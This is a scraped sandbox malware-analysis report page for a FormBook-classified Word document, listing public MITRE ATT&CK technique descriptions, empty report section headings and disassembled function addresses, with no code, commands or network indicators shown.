Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Swift_Payment.MT103.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

User Modules

Function 04316260, Relevance: 1.6, APIs: 1, Instructions: 129
threadCOMMON

Function 00BDAD58, Relevance: 1.6, Strings: 1, Instructions: 302
COMMON

Function 0431688D, Relevance: 1.8, APIs: 1, Instructions: 329
processCOMMON

Function 04316898, Relevance: 1.8, APIs: 1, Instructions: 323
processCOMMON

Function 043164F8, Relevance: 1.6, APIs: 1, Instructions: 123
injectionCOMMON

Function 04316500, Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Function 04316658, Relevance: 1.6, APIs: 1, Instructions: 111
COMMON

Function 04316660, Relevance: 1.6, APIs: 1, Instructions: 108
COMMON

Function 043163D1, Relevance: 1.6, APIs: 1, Instructions: 107
memoryCOMMON

Function 043163D8, Relevance: 1.6, APIs: 1, Instructions: 103
memoryCOMMON

Function 04312861, Relevance: 1.6, APIs: 1, Instructions: 100
memoryCOMMON

Function 04312868, Relevance: 1.6, APIs: 1, Instructions: 96
memoryCOMMON